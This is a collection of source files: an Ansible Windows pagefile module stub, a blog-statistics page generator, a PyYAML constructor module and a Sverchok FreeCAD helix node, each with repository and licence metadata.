# Run the module only when executed as a script (not on import).
if __name__ == '__main__':
    main()
| gpl-3.0 |
veger/ansible | lib/ansible/modules/windows/win_pagefile.py | 28 | 3980 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2017, Liran Nisanov <lirannis@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# this is a windows documentation stub. actual code lives in the .ps1
# file of the same name
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_pagefile
version_added: "2.4"
short_description: Query or change pagefile configuration
description:
- Query current pagefile configuration.
- Enable/Disable AutomaticManagedPagefile.
- Create new or override pagefile configuration.
options:
drive:
description:
- The drive of the pagefile.
initial_size:
description:
- The initial size of the pagefile in megabytes.
type: int
maximum_size:
description:
- The maximum size of the pagefile in megabytes.
type: int
override:
description:
- Override the current pagefile on the drive.
type: bool
default: 'yes'
system_managed:
description:
- Configures current pagefile to be managed by the system.
type: bool
default: 'no'
automatic:
description:
- Configures AutomaticManagedPagefile for the entire system.
type: bool
remove_all:
description:
- Remove all pagefiles in the system, not including automatic managed.
type: bool
default: 'no'
test_path:
description:
- Use Test-Path on the drive to make sure the drive is accessible before creating the pagefile.
type: bool
default: 'yes'
state:
description:
- State of the pagefile.
choices: [ absent, present, query ]
default: query
notes:
    - There is a difference between automatically managed pagefiles, which are configured once for the entire system, and system managed pagefiles, which are configured per pagefile.
- InitialSize 0 and MaximumSize 0 means the pagefile is managed by the system.
    - A value-out-of-range exception may be caused by several different issues; two common problems are a non-existent drive and a pagefile size that is too small.
- Setting a pagefile when AutomaticManagedPagefile is on will disable the AutomaticManagedPagefile.
author:
- Liran Nisanov (@LiranNis)
'''
EXAMPLES = r'''
- name: Query pagefiles configuration
win_pagefile:
- name: Query C pagefile
win_pagefile:
drive: C
- name: Set C pagefile, don't override if exists
win_pagefile:
drive: C
initial_size: 1024
maximum_size: 1024
override: no
state: present
- name: Set C pagefile, override if exists
win_pagefile:
drive: C
initial_size: 1024
maximum_size: 1024
state: present
- name: Remove C pagefile
win_pagefile:
drive: C
state: absent
- name: Remove all current pagefiles, enable AutomaticManagedPagefile and query at the end
win_pagefile:
remove_all: yes
automatic: yes
- name: Remove all pagefiles disable AutomaticManagedPagefile and set C pagefile
win_pagefile:
drive: C
initial_size: 2048
maximum_size: 2048
remove_all: yes
automatic: no
state: present
- name: Set D pagefile, override if exists
win_pagefile:
drive: d
initial_size: 1024
maximum_size: 1024
state: present
'''
RETURN = r'''
automatic_managed_pagefiles:
    description: Whether the pagefiles are automatically managed.
returned: When state is query.
type: boolean
sample: true
pagefiles:
description: Contains caption, description, initial_size, maximum_size and name for each pagefile in the system.
returned: When state is query.
type: list
sample:
[{"caption": "c:\\ 'pagefile.sys'", "description": "'pagefile.sys' @ c:\\", "initial_size": 2048, "maximum_size": 2048, "name": "c:\\pagefile.sys"},
{"caption": "d:\\ 'pagefile.sys'", "description": "'pagefile.sys' @ d:\\", "initial_size": 1024, "maximum_size": 1024, "name": "d:\\pagefile.sys"}]
'''
| gpl-3.0 |
mathblogging/mathblogging | statsview.py | 2 | 5717 | from main import *
class StatsViewBase(TemplatePage):
    """Base class for the "recent statistics" pages.

    Renders four tables (comments per day/week, posts per week/month) for
    every Feed whose category is in self.categories().  Subclasses supply
    the category filter plus url/title/cache metadata.
    """

    # One entry per table: (Feed ordering attribute, HTML table id, heading).
    TABLE_SPECS = (
        ('comments_day', 'commentsperday', 'Comments last 24h'),
        ('comments_week', 'commentsperweek', 'Comments last week'),
        ('posts_week', 'postsperweek', 'Posts last week'),
        ('posts_month', 'postspermonth', 'Posts last month'),
    )

    def generateContent(self):
        """Build the HTML body: navigation box, heading and stats tables."""
        parts = ["""
        <div class="tocbox">
          <ul>
            <li><a href="/bystats" title="Recent stats">All</a></li>
            <li><a href="/bystats-researchers" title="Recent stats for Researchers">Researchers</a></li>
            <li><a href="/bystats-educators" title="Recent stats for Educators">Educators</a></li>
            <li><a href="/bystats-artvis" title="Recent stats for Art, Visual">Art/Visual</a></li>
          </ul>
        </div>
        <h2> The latest stats %(title)s </h2>""" % {
            'title': html_escape(self.selftitle)}]
        # The four tables only differ in ordering field, id and heading,
        # so one helper renders them all (previously four pasted copies).
        for order_field, table_id, heading in self.TABLE_SPECS:
            parts.append(self._stats_table(order_field, table_id, heading))
        return "".join(parts)

    def _stats_table(self, order_field, table_id, heading):
        """Return one <table> of feeds, sorted by *order_field* descending.

        order_field must be a numeric Feed property name (trusted, taken
        from TABLE_SPECS - never user input, as it is interpolated into
        the GQL string).
        """
        rows = []
        query = Feed.gql(
            "WHERE category IN :1 ORDER BY %s DESC" % order_field,
            self.categories())
        for feed in query:
            rows.append("""
            <tr>
              <td valign="bottom" class="datecolumn">%(value)s</td>
              <td valign="bottom" class="blogcolumn">
                <a href="%(homepage)s">%(title)s</a>
              </td>
            </tr>""" % {
                'value': str(getattr(feed, order_field)),
                'homepage': html_escape(feed.homepage),
                'title': html_escape(feed.title)})
        return ("""
        <table class="bydate" id="%(id)s">
          <thead>
            <tr>
              <th align="left" class="datecolumn"></th>
              <th align="left" class="blogcolumn">%(heading)s</th>
            </tr>
          </thead>
          <tbody>""" % {'id': table_id, 'heading': heading}
            + "".join(rows)
            + """
          </tbody>
        </table>""")
class StatsView(StatsViewBase):
    """Statistics page covering every tracked blog category."""
    cacheName = "StatsView"
    selfurl = "bystats"
    selftitle = ""

    def categories(self):
        """Return the full list of categories shown on the "All" page."""
        return [
            'history', 'fun', 'general', 'commercial', 'art',
            'visual', 'pure', 'applied', 'teacher', 'journalism',
        ]
class StatsViewResearchers(StatsViewBase):
    """Statistics page restricted to research-oriented categories."""
    cacheName = "StatsViewResearchers"
    selfurl = "bystats-researchers"
    selftitle = " for researchers"

    def categories(self):
        """Categories considered research blogs."""
        return ['history', 'pure', 'applied', 'general']
class StatsViewEducators(StatsViewBase):
    """Statistics page restricted to teaching blogs."""
    cacheName = "StatsViewEducators"
    selfurl = "bystats-educators"
    selftitle = " for educators"

    def categories(self):
        """Only the teacher category belongs to this page."""
        return ['teacher']
class StatsViewArtVis(StatsViewBase):
    """Statistics page restricted to art and visualisation blogs."""
    cacheName = "StatsViewArtVis"
    selfurl = "bystats-artvis"
    selftitle = " for art and visual"

    def categories(self):
        """Categories considered art/visual blogs."""
        return ['art', 'visual']
| agpl-3.0 |
mloesch/tablib | tablib/packages/yaml3/constructor.py | 83 | 25554 |
__all__ = ['BaseConstructor', 'SafeConstructor', 'Constructor',
'ConstructorError']
from .error import *
from .nodes import *
import base64
import binascii
import collections
import collections.abc
import datetime
import re
import sys
import types
class ConstructorError(MarkedYAMLError):
    """Raised when a YAML node cannot be converted to a native object."""
class BaseConstructor:
    """Turns a composed YAML node graph into native Python objects.

    Tag-to-constructor dispatch tables are class attributes; subclasses
    register handlers with ``add_constructor``/``add_multi_constructor``.
    The composer side of the loader is expected to provide
    ``check_node``/``get_node``/``get_single_node`` as a mixin.
    """

    # Exact-tag handlers and tag-prefix handlers, keyed by tag string.
    yaml_constructors = {}
    yaml_multi_constructors = {}

    def __init__(self):
        # node -> finished object cache (also breaks diamond sharing).
        self.constructed_objects = {}
        # nodes currently being built; used to detect unconstructable cycles.
        self.recursive_objects = {}
        # pending two-phase (generator based) constructors.
        self.state_generators = []
        self.deep_construct = False

    def check_data(self):
        """Return True if more documents are available on the stream."""
        return self.check_node()

    def get_data(self):
        """Construct and return the next document, or None at end of stream."""
        if self.check_node():
            return self.construct_document(self.get_node())

    def get_single_data(self):
        """Ensure the stream contains a single document and construct it."""
        node = self.get_single_node()
        if node is not None:
            return self.construct_document(node)
        return None

    def construct_document(self, node):
        """Construct one document and drain deferred (generator) state."""
        data = self.construct_object(node)
        # Generator-style constructors yield a bare object first and fill
        # its state afterwards; keep pumping until no new ones appear.
        while self.state_generators:
            state_generators = self.state_generators
            self.state_generators = []
            for generator in state_generators:
                for dummy in generator:
                    pass
        self.constructed_objects = {}
        self.recursive_objects = {}
        self.deep_construct = False
        return data

    def construct_object(self, node, deep=False):
        """Construct a single node, dispatching on its tag.

        With deep=True all nested generator constructors are completed
        immediately (needed when the value is used right away).
        """
        if deep:
            old_deep = self.deep_construct
            self.deep_construct = True
        if node in self.constructed_objects:
            return self.constructed_objects[node]
        if node in self.recursive_objects:
            raise ConstructorError(None, None,
                    "found unconstructable recursive node", node.start_mark)
        self.recursive_objects[node] = None
        constructor = None
        tag_suffix = None
        # Dispatch order: exact tag, longest-prefix multi-constructor,
        # catch-all multi/exact handlers, then per-node-kind defaults.
        if node.tag in self.yaml_constructors:
            constructor = self.yaml_constructors[node.tag]
        else:
            for tag_prefix in self.yaml_multi_constructors:
                if node.tag.startswith(tag_prefix):
                    tag_suffix = node.tag[len(tag_prefix):]
                    constructor = self.yaml_multi_constructors[tag_prefix]
                    break
            else:
                if None in self.yaml_multi_constructors:
                    tag_suffix = node.tag
                    constructor = self.yaml_multi_constructors[None]
                elif None in self.yaml_constructors:
                    constructor = self.yaml_constructors[None]
                elif isinstance(node, ScalarNode):
                    constructor = self.__class__.construct_scalar
                elif isinstance(node, SequenceNode):
                    constructor = self.__class__.construct_sequence
                elif isinstance(node, MappingNode):
                    constructor = self.__class__.construct_mapping
        if tag_suffix is None:
            data = constructor(self, node)
        else:
            data = constructor(self, tag_suffix, node)
        if isinstance(data, types.GeneratorType):
            # Two-phase constructor: first yield is the (empty) object.
            generator = data
            data = next(generator)
            if self.deep_construct:
                for dummy in generator:
                    pass
            else:
                self.state_generators.append(generator)
        self.constructed_objects[node] = data
        del self.recursive_objects[node]
        if deep:
            self.deep_construct = old_deep
        return data

    def construct_scalar(self, node):
        """Default scalar handler: return the node's string value."""
        if not isinstance(node, ScalarNode):
            raise ConstructorError(None, None,
                    "expected a scalar node, but found %s" % node.id,
                    node.start_mark)
        return node.value

    def construct_sequence(self, node, deep=False):
        """Default sequence handler: construct each child into a list."""
        if not isinstance(node, SequenceNode):
            raise ConstructorError(None, None,
                    "expected a sequence node, but found %s" % node.id,
                    node.start_mark)
        return [self.construct_object(child, deep=deep)
                for child in node.value]

    def construct_mapping(self, node, deep=False):
        """Default mapping handler: construct a dict from the node pairs."""
        if not isinstance(node, MappingNode):
            raise ConstructorError(None, None,
                    "expected a mapping node, but found %s" % node.id,
                    node.start_mark)
        mapping = {}
        for key_node, value_node in node.value:
            key = self.construct_object(key_node, deep=deep)
            # Bug fix: collections.Hashable was removed in Python 3.10;
            # the ABC lives in collections.abc.
            if not isinstance(key, collections.abc.Hashable):
                raise ConstructorError("while constructing a mapping", node.start_mark,
                        "found unhashable key", key_node.start_mark)
            value = self.construct_object(value_node, deep=deep)
            mapping[key] = value
        return mapping

    def construct_pairs(self, node, deep=False):
        """Construct a mapping node as a list of (key, value) tuples,
        preserving order and duplicates."""
        if not isinstance(node, MappingNode):
            raise ConstructorError(None, None,
                    "expected a mapping node, but found %s" % node.id,
                    node.start_mark)
        pairs = []
        for key_node, value_node in node.value:
            key = self.construct_object(key_node, deep=deep)
            value = self.construct_object(value_node, deep=deep)
            pairs.append((key, value))
        return pairs

    @classmethod
    def add_constructor(cls, tag, constructor):
        """Register *constructor* for an exact *tag* on this class only
        (the dispatch table is copy-on-write per subclass)."""
        if not 'yaml_constructors' in cls.__dict__:
            cls.yaml_constructors = cls.yaml_constructors.copy()
        cls.yaml_constructors[tag] = constructor

    @classmethod
    def add_multi_constructor(cls, tag_prefix, multi_constructor):
        """Register *multi_constructor* for all tags starting with
        *tag_prefix*; the handler receives the remaining tag suffix."""
        if not 'yaml_multi_constructors' in cls.__dict__:
            cls.yaml_multi_constructors = cls.yaml_multi_constructors.copy()
        cls.yaml_multi_constructors[tag_prefix] = multi_constructor
class SafeConstructor(BaseConstructor):
    """Constructor that resolves only the standard YAML 1.1 tags.

    Safe to use on untrusted documents: unlike ``Constructor`` below it
    never instantiates arbitrary Python objects.
    """
    def construct_scalar(self, node):
        # A mapping containing a 'tag:yaml.org,2002:value' key stands for
        # that key's value when a scalar is expected (YAML '=' idiom).
        if isinstance(node, MappingNode):
            for key_node, value_node in node.value:
                if key_node.tag == 'tag:yaml.org,2002:value':
                    return self.construct_scalar(value_node)
        return super().construct_scalar(node)
    def flatten_mapping(self, node):
        # Expand '<<' merge keys in place.  Merged entries are prepended
        # so the node's own (explicit) keys take precedence.
        merge = []
        index = 0
        while index < len(node.value):
            key_node, value_node = node.value[index]
            if key_node.tag == 'tag:yaml.org,2002:merge':
                del node.value[index]
                if isinstance(value_node, MappingNode):
                    self.flatten_mapping(value_node)
                    merge.extend(value_node.value)
                elif isinstance(value_node, SequenceNode):
                    # '<<: [a, b]' merges several mappings; earlier list
                    # entries win, hence the reverse before extending.
                    submerge = []
                    for subnode in value_node.value:
                        if not isinstance(subnode, MappingNode):
                            raise ConstructorError("while constructing a mapping",
                                    node.start_mark,
                                    "expected a mapping for merging, but found %s"
                                    % subnode.id, subnode.start_mark)
                        self.flatten_mapping(subnode)
                        submerge.append(subnode.value)
                    submerge.reverse()
                    for value in submerge:
                        merge.extend(value)
                else:
                    raise ConstructorError("while constructing a mapping", node.start_mark,
                            "expected a mapping or list of mappings for merging, but found %s"
                            % value_node.id, value_node.start_mark)
            elif key_node.tag == 'tag:yaml.org,2002:value':
                key_node.tag = 'tag:yaml.org,2002:str'
                index += 1
            else:
                index += 1
        if merge:
            node.value = merge + node.value
    def construct_mapping(self, node, deep=False):
        # Resolve merge keys before the generic dict construction.
        if isinstance(node, MappingNode):
            self.flatten_mapping(node)
        return super().construct_mapping(node, deep=deep)
    def construct_yaml_null(self, node):
        self.construct_scalar(node)
        return None
    # YAML 1.1 boolean spellings; scalars are lower-cased before lookup.
    bool_values = {
        'yes':      True,
        'no':       False,
        'true':     True,
        'false':    False,
        'on':       True,
        'off':      False,
    }
    def construct_yaml_bool(self, node):
        value = self.construct_scalar(node)
        return self.bool_values[value.lower()]
    def construct_yaml_int(self, node):
        # Handles sign, '_' digit separators, binary/hex/octal prefixes
        # and YAML 1.1 base-60 ('1:30') notation.
        value = self.construct_scalar(node)
        value = value.replace('_', '')
        sign = +1
        if value[0] == '-':
            sign = -1
        if value[0] in '+-':
            value = value[1:]
        if value == '0':
            return 0
        elif value.startswith('0b'):
            return sign*int(value[2:], 2)
        elif value.startswith('0x'):
            return sign*int(value[2:], 16)
        elif value[0] == '0':
            return sign*int(value, 8)
        elif ':' in value:
            # Sexagesimal: least-significant part first after reversing.
            digits = [int(part) for part in value.split(':')]
            digits.reverse()
            base = 1
            value = 0
            for digit in digits:
                value += digit*base
                base *= 60
            return sign*value
        else:
            return sign*int(value)
    # Compute +inf portably by squaring until overflow saturates.
    inf_value = 1e300
    while inf_value != inf_value*inf_value:
        inf_value *= inf_value
    nan_value = -inf_value/inf_value   # Trying to make a quiet NaN (like C99).
    def construct_yaml_float(self, node):
        # Same shape as construct_yaml_int plus '.inf'/'.nan' literals.
        value = self.construct_scalar(node)
        value = value.replace('_', '').lower()
        sign = +1
        if value[0] == '-':
            sign = -1
        if value[0] in '+-':
            value = value[1:]
        if value == '.inf':
            return sign*self.inf_value
        elif value == '.nan':
            return self.nan_value
        elif ':' in value:
            digits = [float(part) for part in value.split(':')]
            digits.reverse()
            base = 1
            value = 0.0
            for digit in digits:
                value += digit*base
                base *= 60
            return sign*value
        else:
            return sign*float(value)
    def construct_yaml_binary(self, node):
        # !!binary scalars are base64 text; decode to bytes.
        try:
            value = self.construct_scalar(node).encode('ascii')
        except UnicodeEncodeError as exc:
            raise ConstructorError(None, None,
                    "failed to convert base64 data into ascii: %s" % exc,
                    node.start_mark)
        try:
            # decodebytes replaced decodestring; keep the fallback for
            # older Python 3 releases.
            if hasattr(base64, 'decodebytes'):
                return base64.decodebytes(value)
            else:
                return base64.decodestring(value)
        except binascii.Error as exc:
            raise ConstructorError(None, None,
                    "failed to decode base64 data: %s" % exc, node.start_mark)
    # ISO 8601-style timestamp with optional time, fraction and timezone.
    timestamp_regexp = re.compile(
            r'''^(?P<year>[0-9][0-9][0-9][0-9])
                -(?P<month>[0-9][0-9]?)
                -(?P<day>[0-9][0-9]?)
                (?:(?:[Tt]|[ \t]+)
                (?P<hour>[0-9][0-9]?)
                :(?P<minute>[0-9][0-9])
                :(?P<second>[0-9][0-9])
                (?:\.(?P<fraction>[0-9]*))?
                (?:[ \t]*(?P<tz>Z|(?P<tz_sign>[-+])(?P<tz_hour>[0-9][0-9]?)
                (?::(?P<tz_minute>[0-9][0-9]))?))?)?$''', re.X)
    def construct_yaml_timestamp(self, node):
        # Returns datetime.date when no time part is given, otherwise a
        # naive datetime normalized to UTC when an offset was present.
        value = self.construct_scalar(node)
        match = self.timestamp_regexp.match(node.value)
        values = match.groupdict()
        year = int(values['year'])
        month = int(values['month'])
        day = int(values['day'])
        if not values['hour']:
            return datetime.date(year, month, day)
        hour = int(values['hour'])
        minute = int(values['minute'])
        second = int(values['second'])
        fraction = 0
        if values['fraction']:
            # Pad/truncate the fraction to microseconds (6 digits).
            fraction = values['fraction'][:6]
            while len(fraction) < 6:
                fraction += '0'
            fraction = int(fraction)
        delta = None
        if values['tz_sign']:
            tz_hour = int(values['tz_hour'])
            tz_minute = int(values['tz_minute'] or 0)
            delta = datetime.timedelta(hours=tz_hour, minutes=tz_minute)
            if values['tz_sign'] == '-':
                delta = -delta
        data = datetime.datetime(year, month, day, hour, minute, second, fraction)
        if delta:
            data -= delta
        return data
    def construct_yaml_omap(self, node):
        # Note: we do not check for duplicate keys, because it's too
        # CPU-expensive.
        omap = []
        yield omap
        if not isinstance(node, SequenceNode):
            raise ConstructorError("while constructing an ordered map", node.start_mark,
                    "expected a sequence, but found %s" % node.id, node.start_mark)
        for subnode in node.value:
            if not isinstance(subnode, MappingNode):
                raise ConstructorError("while constructing an ordered map", node.start_mark,
                        "expected a mapping of length 1, but found %s" % subnode.id,
                        subnode.start_mark)
            if len(subnode.value) != 1:
                raise ConstructorError("while constructing an ordered map", node.start_mark,
                        "expected a single mapping item, but found %d items" % len(subnode.value),
                        subnode.start_mark)
            key_node, value_node = subnode.value[0]
            key = self.construct_object(key_node)
            value = self.construct_object(value_node)
            omap.append((key, value))
    def construct_yaml_pairs(self, node):
        # Note: the same code as `construct_yaml_omap`.
        pairs = []
        yield pairs
        if not isinstance(node, SequenceNode):
            raise ConstructorError("while constructing pairs", node.start_mark,
                    "expected a sequence, but found %s" % node.id, node.start_mark)
        for subnode in node.value:
            if not isinstance(subnode, MappingNode):
                raise ConstructorError("while constructing pairs", node.start_mark,
                        "expected a mapping of length 1, but found %s" % subnode.id,
                        subnode.start_mark)
            if len(subnode.value) != 1:
                raise ConstructorError("while constructing pairs", node.start_mark,
                        "expected a single mapping item, but found %d items" % len(subnode.value),
                        subnode.start_mark)
            key_node, value_node = subnode.value[0]
            key = self.construct_object(key_node)
            value = self.construct_object(value_node)
            pairs.append((key, value))
    def construct_yaml_set(self, node):
        # Two-phase (generator) constructor so recursive sets resolve.
        data = set()
        yield data
        value = self.construct_mapping(node)
        data.update(value)
    def construct_yaml_str(self, node):
        return self.construct_scalar(node)
    def construct_yaml_seq(self, node):
        # Two-phase constructor: yield the empty list first so cycles work.
        data = []
        yield data
        data.extend(self.construct_sequence(node))
    def construct_yaml_map(self, node):
        # Two-phase constructor: yield the empty dict first so cycles work.
        data = {}
        yield data
        value = self.construct_mapping(node)
        data.update(value)
    def construct_yaml_object(self, node, cls):
        # Create the instance without running __init__, then restore its
        # state either via __setstate__ or by updating __dict__.
        data = cls.__new__(cls)
        yield data
        if hasattr(data, '__setstate__'):
            state = self.construct_mapping(node, deep=True)
            data.__setstate__(state)
        else:
            state = self.construct_mapping(node)
            data.__dict__.update(state)
    def construct_undefined(self, node):
        # Fallback for unknown tags: always an error in the safe loader.
        raise ConstructorError(None, None,
                "could not determine a constructor for the tag %r" % node.tag,
                node.start_mark)
# Register the handlers above for the standard YAML 1.1 tags; the final
# None entry makes any unrecognised tag an error in the safe loader.
SafeConstructor.add_constructor(
        'tag:yaml.org,2002:null',
        SafeConstructor.construct_yaml_null)
SafeConstructor.add_constructor(
        'tag:yaml.org,2002:bool',
        SafeConstructor.construct_yaml_bool)
SafeConstructor.add_constructor(
        'tag:yaml.org,2002:int',
        SafeConstructor.construct_yaml_int)
SafeConstructor.add_constructor(
        'tag:yaml.org,2002:float',
        SafeConstructor.construct_yaml_float)
SafeConstructor.add_constructor(
        'tag:yaml.org,2002:binary',
        SafeConstructor.construct_yaml_binary)
SafeConstructor.add_constructor(
        'tag:yaml.org,2002:timestamp',
        SafeConstructor.construct_yaml_timestamp)
SafeConstructor.add_constructor(
        'tag:yaml.org,2002:omap',
        SafeConstructor.construct_yaml_omap)
SafeConstructor.add_constructor(
        'tag:yaml.org,2002:pairs',
        SafeConstructor.construct_yaml_pairs)
SafeConstructor.add_constructor(
        'tag:yaml.org,2002:set',
        SafeConstructor.construct_yaml_set)
SafeConstructor.add_constructor(
        'tag:yaml.org,2002:str',
        SafeConstructor.construct_yaml_str)
SafeConstructor.add_constructor(
        'tag:yaml.org,2002:seq',
        SafeConstructor.construct_yaml_seq)
SafeConstructor.add_constructor(
        'tag:yaml.org,2002:map',
        SafeConstructor.construct_yaml_map)
SafeConstructor.add_constructor(None,
        SafeConstructor.construct_undefined)
class Constructor(SafeConstructor):
    """Full (unsafe) constructor that also resolves the python/* tags.

    WARNING: this constructor can import modules and instantiate arbitrary
    Python objects, so it must never be used on untrusted documents.
    """

    def construct_python_str(self, node):
        return self.construct_scalar(node)

    def construct_python_unicode(self, node):
        # On Python 3, str and unicode are the same type.
        return self.construct_scalar(node)

    def construct_python_bytes(self, node):
        # Same decoding as SafeConstructor.construct_yaml_binary.
        try:
            value = self.construct_scalar(node).encode('ascii')
        except UnicodeEncodeError as exc:
            raise ConstructorError(None, None,
                    "failed to convert base64 data into ascii: %s" % exc,
                    node.start_mark)
        try:
            if hasattr(base64, 'decodebytes'):
                return base64.decodebytes(value)
            else:
                return base64.decodestring(value)
        except binascii.Error as exc:
            raise ConstructorError(None, None,
                    "failed to decode base64 data: %s" % exc, node.start_mark)

    def construct_python_long(self, node):
        # Python 3 has a single integer type.
        return self.construct_yaml_int(node)

    def construct_python_complex(self, node):
        return complex(self.construct_scalar(node))

    def construct_python_tuple(self, node):
        return tuple(self.construct_sequence(node))

    def find_python_module(self, name, mark):
        """Import and return the module named in a python/module tag."""
        if not name:
            raise ConstructorError("while constructing a Python module", mark,
                    "expected non-empty name appended to the tag", mark)
        try:
            __import__(name)
        except ImportError as exc:
            raise ConstructorError("while constructing a Python module", mark,
                    "cannot find module %r (%s)" % (name, exc), mark)
        return sys.modules[name]

    def find_python_name(self, name, mark):
        """Resolve a dotted 'module.attr' name (bare names -> builtins)."""
        if not name:
            raise ConstructorError("while constructing a Python object", mark,
                    "expected non-empty name appended to the tag", mark)
        if '.' in name:
            module_name, object_name = name.rsplit('.', 1)
        else:
            module_name = 'builtins'
            object_name = name
        try:
            __import__(module_name)
        except ImportError as exc:
            raise ConstructorError("while constructing a Python object", mark,
                    "cannot find module %r (%s)" % (module_name, exc), mark)
        module = sys.modules[module_name]
        if not hasattr(module, object_name):
            raise ConstructorError("while constructing a Python object", mark,
                    "cannot find %r in the module %r"
                    % (object_name, module.__name__), mark)
        return getattr(module, object_name)

    def construct_python_name(self, suffix, node):
        # !!python/name:module.attr -- scalar value must be empty.
        value = self.construct_scalar(node)
        if value:
            raise ConstructorError("while constructing a Python name", node.start_mark,
                    "expected the empty value, but found %r" % value, node.start_mark)
        return self.find_python_name(suffix, node.start_mark)

    def construct_python_module(self, suffix, node):
        # !!python/module:name -- scalar value must be empty.
        value = self.construct_scalar(node)
        if value:
            raise ConstructorError("while constructing a Python module", node.start_mark,
                    "expected the empty value, but found %r" % value, node.start_mark)
        return self.find_python_module(suffix, node.start_mark)

    def make_python_instance(self, suffix, node,
            args=None, kwds=None, newobj=False):
        """Create an instance of the class named by *suffix*.

        With newobj=True the object is created via cls.__new__ (pickle's
        'new' protocol); otherwise the class is called normally.
        """
        if not args:
            args = []
        if not kwds:
            kwds = {}
        cls = self.find_python_name(suffix, node.start_mark)
        if newobj and isinstance(cls, type):
            return cls.__new__(cls, *args, **kwds)
        else:
            return cls(*args, **kwds)

    def set_python_instance_state(self, instance, state):
        """Restore pickle-style state onto *instance*."""
        if hasattr(instance, '__setstate__'):
            instance.__setstate__(state)
        else:
            slotstate = {}
            # A 2-tuple state is (dict state, slot state), as in pickle.
            if isinstance(state, tuple) and len(state) == 2:
                state, slotstate = state
            if hasattr(instance, '__dict__'):
                instance.__dict__.update(state)
            elif state:
                slotstate.update(state)
            for key, value in slotstate.items():
                # Bug fix: the original wrote setattr(object, ...), setting
                # attributes on the builtin `object` and losing slot state.
                setattr(instance, key, value)

    def construct_python_object(self, suffix, node):
        # Format:
        #   !!python/object:module.name { ... state ... }
        instance = self.make_python_instance(suffix, node, newobj=True)
        yield instance
        deep = hasattr(instance, '__setstate__')
        state = self.construct_mapping(node, deep=deep)
        self.set_python_instance_state(instance, state)

    def construct_python_object_apply(self, suffix, node, newobj=False):
        # Format:
        #   !!python/object/apply       # (or !!python/object/new)
        #   args: [ ... arguments ... ]
        #   kwds: { ... keywords ... }
        #   state: ... state ...
        #   listitems: [ ... listitems ... ]
        #   dictitems: { ... dictitems ... }
        # or short format:
        #   !!python/object/apply [ ... arguments ... ]
        # The difference between !!python/object/apply and !!python/object/new
        # is how an object is created, check make_python_instance for details.
        if isinstance(node, SequenceNode):
            args = self.construct_sequence(node, deep=True)
            kwds = {}
            state = {}
            listitems = []
            dictitems = {}
        else:
            value = self.construct_mapping(node, deep=True)
            args = value.get('args', [])
            kwds = value.get('kwds', {})
            state = value.get('state', {})
            listitems = value.get('listitems', [])
            dictitems = value.get('dictitems', {})
        instance = self.make_python_instance(suffix, node, args, kwds, newobj)
        if state:
            self.set_python_instance_state(instance, state)
        if listitems:
            instance.extend(listitems)
        if dictitems:
            for key in dictitems:
                instance[key] = dictitems[key]
        return instance

    def construct_python_object_new(self, suffix, node):
        return self.construct_python_object_apply(suffix, node, newobj=True)
# Register the python/* tag handlers on the full (unsafe) constructor;
# prefix tags use multi-constructors so the suffix carries the name.
Constructor.add_constructor(
    'tag:yaml.org,2002:python/none',
    Constructor.construct_yaml_null)
Constructor.add_constructor(
    'tag:yaml.org,2002:python/bool',
    Constructor.construct_yaml_bool)
Constructor.add_constructor(
    'tag:yaml.org,2002:python/str',
    Constructor.construct_python_str)
Constructor.add_constructor(
    'tag:yaml.org,2002:python/unicode',
    Constructor.construct_python_unicode)
Constructor.add_constructor(
    'tag:yaml.org,2002:python/bytes',
    Constructor.construct_python_bytes)
Constructor.add_constructor(
    'tag:yaml.org,2002:python/int',
    Constructor.construct_yaml_int)
Constructor.add_constructor(
    'tag:yaml.org,2002:python/long',
    Constructor.construct_python_long)
Constructor.add_constructor(
    'tag:yaml.org,2002:python/float',
    Constructor.construct_yaml_float)
Constructor.add_constructor(
    'tag:yaml.org,2002:python/complex',
    Constructor.construct_python_complex)
Constructor.add_constructor(
    'tag:yaml.org,2002:python/list',
    Constructor.construct_yaml_seq)
Constructor.add_constructor(
    'tag:yaml.org,2002:python/tuple',
    Constructor.construct_python_tuple)
Constructor.add_constructor(
    'tag:yaml.org,2002:python/dict',
    Constructor.construct_yaml_map)
Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/name:',
    Constructor.construct_python_name)
Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/module:',
    Constructor.construct_python_module)
Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/object:',
    Constructor.construct_python_object)
Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/object/apply:',
    Constructor.construct_python_object_apply)
Constructor.add_multi_constructor(
    'tag:yaml.org,2002:python/object/new:',
    Constructor.construct_python_object_new)
| mit |
DolphinDream/sverchok | nodes/curve/freecad_helix.py | 2 | 3427 | # This file is part of project Sverchok. It's copyrighted by the contributors
# recorded in the version control history of the file, available from
# its original location https://github.com/nortikin/sverchok/commit/master
#
# SPDX-License-Identifier: GPL3
# License-Filename: LICENSE
import bpy
from bpy.props import FloatProperty, EnumProperty, BoolProperty, IntProperty
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.data_structure import updateNode, zip_long_repeat, ensure_nesting_level
from sverchok.utils.curve.freecad import make_helix
from sverchok.utils.dummy_nodes import add_dummy
from sverchok.dependencies import FreeCAD
# FreeCAD is an optional dependency.  Without it we register a placeholder
# ("dummy") node so node trees referencing it still load; with it we define
# the real helix-generating node.
if FreeCAD is None:
    add_dummy('SvFreeCadHelixNode', 'Helix (FreeCAD)', 'FreeCAD')
else:
    import Part
    from FreeCAD import Base

    class SvFreeCadHelixNode(bpy.types.Node, SverchCustomTreeNode):
        """
        Triggers: Helix
        Tooltip: Generate a helix curve (as a NURBS)
        """
        bl_idname = 'SvFreeCadHelixNode'
        bl_label = 'Helix (FreeCAD)'
        bl_icon = 'MOD_SCREW'

        # Helix radius (at the base, for conic helixes).
        radius : FloatProperty(
            name = "Radius",
            default = 1.0,
            update = updateNode)

        # Total extent of the helix along its axis.
        height : FloatProperty(
            name = "Height",
            default = 4.0,
            update = updateNode)

        pitch : FloatProperty(
            name = "Pitch",
            description = "Helix step along it's axis for each full rotation",
            default = 1.0,
            update = updateNode)

        angle : FloatProperty(
            name = "Angle",
            description = "Apex angle for conic helixes, in degrees; 0 for cylindrical helixes",
            default = 0,
            min = 0,
            update = updateNode)

        join : BoolProperty(
            name = "Join",
            description = "If checked, output a single flat list of curves; otherwise, output a separate list of curves for each set of input parameters",
            default = False,
            update = updateNode)

